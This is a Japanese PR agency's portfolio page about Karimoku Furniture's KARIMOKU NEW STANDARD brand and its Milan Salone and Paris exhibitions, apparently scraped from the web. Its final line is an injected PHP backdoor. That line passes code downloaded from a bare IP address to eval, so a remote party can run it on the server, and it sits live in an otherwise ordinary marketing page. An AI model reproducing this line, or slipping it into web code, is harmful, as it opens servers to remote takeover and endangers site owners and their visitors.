デイリープレス

カリモク家具株式会社

創業以来70年の歴史を誇る日本の木製家具トップメーカー、カリモク家具。最新鋭の設備と職人の技と感性が、品質にこだわって日本国内で家具を作り続けている。
2010年に発売をスタートした「KARIMOKU NEW STANDARD」を中心に、ブランドのPR及びマーケティング・コミュニケーションを担当。
Photo : Takumi Ota

「KARIMOKU NEW STANDARD 」は、クリエイティブディレクターに柳原照弘を起用し、国内外の気鋭のデザイナーが参加するカリモクの新しいブランド
2010年から、ミラノサローネ期間中、ミラノの中心にあるコンテンポラリーギャラリーにて、世界に向けて新作の発表を行っている。
Photo : Takumi Ota

2011年も引き続き、ミラノサローネに出展。「日常に存在するモノの価値とはなにか?」をテーマとし、日常に寄り添う家具をつくりつづけるKARIMOKU NEW STANDARDと、日々膨大な写真を撮ることをライフワークとする写真家 鈴木 心氏がコラボレーションを試み、エキシビション「A DAY KARIMOKU NEW STANDARD × SHIN SUZUKI」開催。
このエキシビションは、トレンド予測の第一人者、リー・エデルコート氏より高く評価され、エデルコート氏の招きで、パリのデザインウィーク「Designer’s Days」期間中に、巡回展も開催された。
Photo : Shin Suzuki

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>